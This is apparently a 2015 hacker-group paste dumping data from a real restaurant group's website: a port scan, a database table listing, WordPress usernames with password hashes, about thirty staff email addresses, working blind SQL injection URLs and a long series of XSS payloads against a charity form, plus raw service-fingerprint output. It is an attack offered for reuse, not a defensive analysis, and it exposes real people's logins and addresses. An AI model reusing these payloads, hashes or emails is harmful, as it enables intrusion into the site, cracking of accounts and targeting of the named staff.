An0nBlank

www.maxrestaurantgroup.com Data Dump

Jul 13th, 2015
  1. /$$ /$$ /$$$$$$$$ /$$$$$$
  2. | $$ | $$|__ $$__//$$__ $$
  3. | $$ | $$ | $$ | $$ \__/ /$$$$$$$$
  4. | $$$$$$$$ | $$ | $$ /$$$$|____ /$$/
  5. | $$ | $$ | $$ | $$ \ $$ /$$__/
  6. | $$__ $$ | $$ | $$|_ $$ /$$$$/
  7. | $$ | $$ | $$ | $$ \ $$ /$$__/
  8. | $$ | $$ | $$ | $$$$$$/ /$$$$$$$$
  9. |__/ |__/ |__/ \______/ |________/
  10.  
  11. /$$$$$$ /$$$$$$ /$$$$$$
  12. |_ $$_/ /$$__ $$ /$$__ $$
  13. | $$ | $$ \__/ | $$ \ $$
  14. | $$ | $$$$$$ | $$$$$$$$
  15. | $$ \____ $$ | $$__ $$
  16. | $$ /$$ \ $$ | $$ | $$
  17. /$$$$$$| $$$$$$/ | $$ | $$
  18. |______/ \______/ |__/ |__/
  19.  
  20.  
  21.  
  22. /$$$$$$ /$$$$$$ /$$$$$$$
  23. /$$__ $$ /$$__ $$| $$__ $$
  24. | $$ \__/| $$ \ $$| $$ \ $$
  25. | $$ /$$$$| $$ | $$| $$ | $$
  26. | $$|_ $$| $$ | $$| $$ | $$
  27. | $$|_ $$| $$ | $$| $$ | $$
  28. | $$ \ $$| $$ | $$| $$ | $$
  29. | $$$$$$/| $$$$$$/| $$$$$$$/
  30. \______/ \______/ |_______/
  31.  
  32. Twitter @HTGzSecurity
  33. Facebook https://www.facebook.com/An0nBlank
  34. HTGz Security
  35.  
  36. ~ By HTGz Security
  37.  
  38. #Operation HTGz Security
  39. ++++++++++++++++++++++++++
  40.  
  41. *==================================================================================================*
  42. | Domain: http://www.maxrestaurantgroup.com/ |
  43. | Server: Apache |
  44. | IP: 70.166.50.25 |
  45. |open port 110/tcp on 70.166.50.25 |
  46. |open port 443/tcp on 70.166.50.25 |
  47. |open port 143/tcp on 70.166.50.25 |
  48. |open port 21/tcp on 70.166.50.25 |
  49. |open port 587/tcp on 70.166.50.25 |
  50. |open port 80/tcp on 70.166.50.25 |
  51. |open port 10025/tcp smtp qmail smtpd |
  52. |8443/tcp open http Apache httpd |
  53. *==================================================================================================*
  54. | MD5: f417 9f2f 34a4 7a64 10bb 4ad5 84f4 7a13
  55. |_SHA-1: 494d bead 0570 32bc fca1 b0d9 57f0 8759 1020 c95c
  56. ==========================================================
  57. | MD5: bb3e 1f05 cbd2 936c f532 a72b fd15 c94e
  58. |_SHA-1: 55d8 ef58 302d f696 e170 848f 6a3e 76f2 76de 40cc
  59. ==========================================================
  60. | MD5: fa94 49b1 1b56 4bd1 368b 415f 58d6 1e56
  61. |_SHA-1: a1e9 745b 76b5 5926 a34b 0790 2f48 7a66 55ea 8457
  62.  
  63. http://www.maxrestaurantgroup.com
  64. [200] ActiveX[Flash-ActiveX][D27CDB6E-AE6D-11cf-96B8-444553540000],
  65. Adobe-Flash, Apache[2.x],
  66. Country[UNITED STATES][US],
  67. HTTPServer[Apache],
  68. IP[70.166.50.25],
  69. JQuery, Object["application/x-shockwave-flash]["clsid:D27CDB6E-AE6D-11cf-96B8-444553540000], Script[text/javascript], Title[Welcome to the Max Restaurant Group]
  70.  
  71. databases (2)
  72. information_schema
  73. maxdiningcard
  74.  
  75. Database:maxdiningcard
  76. (76 tables)
  77. *===========================*
  78. | RecordLocks |
  79. | RecycleBin |
  80. | RecycleBinTechSupport |
  81. | categories_12-08-2011 |
  82. | orders_01-11-2012 |
  83. | orders_05-17-2012 |
  84. | orders_backup-07-14-2011 |
  85. | orders_backup-07-15-2011 |
  86. | calendar |
  87. | calendar_events_locations |
  88. | calendar_images_videos |
  89. | categories |
  90. | categories2 |
  91. | coupon_customers |
  92. | coupons |
  93. | coupons_customers |
  94. | customers |
  95. | documents |
  96. | emails |
  97. | grouping_general |
  98. | hits |
  99. | hits_clean |
  100. | ipbans |
  101. | jobs |
  102. | locations |
  103. | max__shipopt |
  104. | max_albums |
  105. | max_blogposts |
  106. | max_blogusers |
  107. | max_categories |
  108. | max_customers |
  109. | max_emails |
  110. | max_galleries |
  111. | max_gallerygroups |
  112. | max_optionitems |
  113. | max_optionproducts |
  114. | max_options |
  115. | max_optionsproducts |
  116. | max_orders |
  117. | max_photos |
  118. | max_products |
  119. | max_products_sold |
  120. | max_promocodes |
  121. | max_subcategories |
  122. | max_watermarks |
  123. | menu |
  124. | menu2 |
  125. | orders |
  126. | orders_TEMP |
  127. | pdfs |
  128. | people |
  129. | phoneorders |
  130. | pressreleases |
  131. | products |
  132. | products_discounts |
  133. | products_htmlemails |
  134. | recipes |
  135. | resumes |
  136. | reviews |
  137. | temp_orders |
  138. | temp_redem_orders |
  139. | thecooper_registrations |
  140. | votes |
  141. | websiteusers |
  142. | wp_ak_twitter |
  143. | wp_commentmeta |
  144. | wp_comments |
  145. | wp_links |
  146. | wp_options |
  147. | wp_postmeta |
  148. | wp_posts |
  149. | wp_term_relationships |
  150. | wp_term_taxonomy |
  151. | wp_terms |
  152. | wp_usermeta |
  153. | wp_users |
  154. *===========================*
  155.  
  156. Database:maxdiningcard
  157. Table:RecycleBin
  158. *============*
  159. | Column |
  160. *============*
  161. | timestamp |
  162. | companyid |
  163. | data |
  164. | id |
  165. | identifier |
  166. | tablename |
  167. *============*
  168.  
  169. Database:maxdiningcard
  170. Table:emails
  171. (5 columns)
  172. *============*
  173. | Column |
  174. *============*
  175. | active |
  176. | companyid |
  177. | email |
  178. | id |
  179. | name |
  180. *============*
  181.  
  182. Database:maxdiningcard
  183. Table:max_emails
  184. (6 columns)
  185. *===========*
  186. | Column |
  187. *===========*
  188. | date |
  189. | email |
  190. | emailfrom |
  191. | emailto |
  192. | id |
  193. | subject |
  194. *===========*
  195.  
  196. Database:maxdiningcard
  197. Table:wp_users
  198. (10 columns)
  199. *=====================*
  200. | Column |
  201. *=====================*
  202. | display_name |
  203. | ID |
  204. | user_activation_key |
  205. | user_email |
  206. | user_login |
  207. | user_nicename |
  208. | user_pass |
  209. | user_registered |
  210. | user_status |
  211. | user_url |
  212. *=====================*
  213.  
  214.  
  215. Database:maxdiningcard
  216. Table:wp_users
  217. (4 entries)
  218. *============*
  219. | user_login |
  220. *============*
  221. | bmitchell |
  222. | bobbyv |
  223. | lmahon |
  224. | newwave |
  225. *============*
  226.  
  227. Database:maxdiningcard
  228. Table:wp_users
  229. (4 entries)
  230. *====================================*
  231. | user_pass |
  232. *====================================*
  233. | $P$B7eMCaH6dU4xxK1rDtKKCua/gjA2qa. |
  234. | $P$BBfY8gLO86CwH8hq7o0XKkve68ShVL1 |
  235. | $P$BslJtgL90o1DXwqh7Ak7lIdN3AZxmB1 |
  236. | $P$BVww4bE3tbNGZ/bhMsW2aXoJe4SrtB0 |
  237. *====================================*
  238.  
  239. Emails:
  240.  
  241. Email ssmith@maxsoysterbar.com
  242. Email dkelly@maxburgerct.com
  243. Email ssmith@maxtavern.com
  244. Email bcooke@maxsoysterbar.com
  245. Email smichalewicz@mrgct.com
  246. Email sharbeclincoln@mrgct.com
  247. Email tdoupence@arthritis.org
  248. Email ssmith@maxburgerct.com
  249. Email dmascolo@trumbullkitchen.com
  250. Email msnook@mrgct.com
  251. Email bkarsky@maxamiaristorante.com
  252. Email bkohnstam@maxamore.com
  253. Email ssmith@maxdowntown.com
  254. Email apurcell@maxsoysterbar.com
  255. Email ssmith@maxamore.com
  256. Email agabriele@maxdowntown.com
  257. Email ssmith@trumbullkitchen.com
  258. Email jobs@maxrestaurantgroup.com
  259. Email mconley@maxamore.com
  260. Email ssmith@maxamiaristorante.com
  261. Email mconley@maxfishct.com
  262. Email maxcares@mrgct.com
  263. Email wpenenori@thecooperrestaurant.com
  264. Email ttaillifer@mrgct.com
  265. Email aconstable@mrgct.com
  266. Email ttaillefer@mrgct.com
  267. Email smiller@mrgct.com
  268. Email abombard@mrgct.com
  269. Email bcosta@maxfishct.com
  270. Email dtoupence@arthritis.org
  271. Email aconstable@maxrestaurantgroup.com
  272. Email maxmail@mrgct.com
  273. Email dkinoshita@maxtavern.com
  274. -------------------------------------------------------------------------------------------------------------------------------------------------
  275. Blind SQL Injection
  276. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=4'+AND+'1'='1
  277. | Keyword: introduction
  278. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=2'+AND+'1'='1
  279. | Keyword: Steven
  280. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=3'+AND+'1'='1
  281. | Keyword: developed
  282. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=5'+AND+'1'='1
  283. | Keyword: Partner
  284. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=6'+AND+'1'='1
  285. | Keyword: native
  286. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=18'+AND+'1'='1
  287. | Keyword: General
  288. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=22'+AND+'1'='1
  289. | Keyword: Managing
  290. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=20'+AND+'1'='1
  291. | Keyword: Managing
  292. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=26'+AND+'1'='1
  293. | Keyword: Executive
  294. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=95+AND+1=1
  295. | Keyword: Valley
  296. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=102+AND+1=1
  297. | Keyword: orders
  298. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=35+AND+1=1
  299. | Keyword: Restaurant
  300. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=92+AND+1=1
  301. | Keyword: Downtown
  302. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=94+AND+1=1
  303. | Keyword: Downtown
  304. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=93+AND+1=1
  305. | Keyword: Restaurant
  306. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=30'+AND+'1'='1
  307. | Keyword: Executive
  308. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=23'+AND+'1'='1
  309. | Keyword: General
  310. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=11'+AND+'1'='1
  311. | Keyword: Executive
  312. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=24'+AND+'1'='1
  313. | Keyword: General
  314. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=32'+AND+'1'='1
  315. | Keyword: Executive
  316. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=7'+AND+'1'='1
  317. | Keyword: Executive
  318. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=29'+AND+'1'='1
  319. | Keyword: Executive
  320. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=33'+AND+'1'='1
  321. | Keyword: McKenzie
  322. |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=31'+AND+'1'='1
  323. | Keyword: General
  324. -------------------------------------------------------------------------------------------------------------------------------------------------
  325. -------------------------------------------------------------------------------------------------------------------------------------------------
  326. | Cross-Site Scripting (XSS)
  327. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  328. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<script>alert('XSS')</script>&FormVars[Justification]=123
  329. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  330. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<IMG SRC="javascript:alert('XSS');">&FormVars[Justification]=123
  331. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  332. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&FormVars[Justification]=123
  333. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  334. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&FormVars[Justification]=123
  335. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  336. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&FormVars[Justification]=123
  337. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  338. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<body onload="javascript:alert('XSS')"></body>&FormVars[Justification]=123
  339. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  340. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<table background="javascript:alert('XSS')"></table>&FormVars[Justification]=123
  341. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  342. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<script>alert('XSS')</script>
  343. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  344. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<IMG SRC="javascript:alert('XSS');">
  345. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  346. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  347. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  348. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  349. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  350. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
  351. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  352. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<body onload="javascript:alert('XSS')"></body>
  353. | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
  354. | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<table background="javascript:alert('XSS')"></table>
  355. -------------------------------------------------------------------------------------------------------------------------------------------------
  356.  
  357. SF:B0,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAM
  358. SF:ESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x
  359. SF:20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=
  360. SF:UNION\x20STARTTLS\]\r\n")%r(GetRequest,112,"\*\x20OK\x20\[CAPABILITY\x2
  361. SF:0IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT
  362. SF:\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SH
  363. SF:A1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\nGET\x20N
  364. SF:O\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n\*
  365. SF:\x20NO\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\
  366. SF:r\n")%r(GenericLines,110,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDP
  367. SF:LUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFEREN
  368. SF:CES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x
  369. SF:20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\n\*\x20NO\x20Error\x20in\x2
  370. SF:0IMAP\x20command\x20received\x20by\x20server\.\r\n\*\x20NO\x20Error\x20
  371. SF:in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n")%r(HTTPOptions
  372. SF:,116,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20N
  373. SF:AMESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA
  374. SF:\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL
  375. SF:2=UNION\x20STARTTLS\]\r\nOPTIONS\x20NO\x20Error\x20in\x20IMAP\x20comman
  376. SF:d\x20received\x20by\x20server\.\r\n\*\x20NO\x20Error\x20in\x20IMAP\x20c
  377. SF:ommand\x20received\x20by\x20server\.\r\n")%r(RTSPRequest,116,"\*\x20OK\
  378. SF:x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THR
  379. SF:EAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-M
  380. SF:D5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STAR
  381. SF:TTLS\]\r\nOPTIONS\x20NO\x20Error\x20in\x20IMAP\x20command\x20received\x
  382. SF:20by\x20server\.\r\n\*\x20NO\x20Error\x20in\x20IMAP\x20command\x20recei
  383. SF:ved\x20by\x20server\.\r\n")%r(RPCCheck,B0,"\*\x20OK\x20\[CAPABILITY\x20
  384. SF:IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT\
  385. SF:x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA
  386. SF:1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\n");